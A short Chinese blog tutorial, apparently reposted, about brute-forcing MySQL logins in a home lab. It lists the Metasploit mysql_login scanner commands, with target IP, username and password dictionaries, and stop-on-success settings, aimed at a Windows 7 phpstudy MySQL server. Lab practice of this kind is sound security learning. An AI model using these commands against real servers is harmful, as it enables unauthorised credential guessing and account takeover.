本文共 320 字,大约阅读时间需要 1 分钟。
实验环境:
攻击机:kali
被攻击方:windows 7 (phpstudy上的mysql服务)
前提是对方必须开启mysql远程登陆服务,开启了3306端口
如何启动mysql远程登陆,可参考这篇文章
开始攻击
- use auxiliary/scanner/mysql/mysql_login
- 查看此模块的选项:show options
- 设置 set RHOST 192.168.11.101 (这是我windows7 的ip地址) set user_file 用户名字典的路径(位置) set pass_file 密码字典的路径(位置) set STOP_ON_SUCCESS yes (只要爆破成功就停止) run 启动攻击,开始爆破
转载地址:http://fyhzi.baihongyu.com/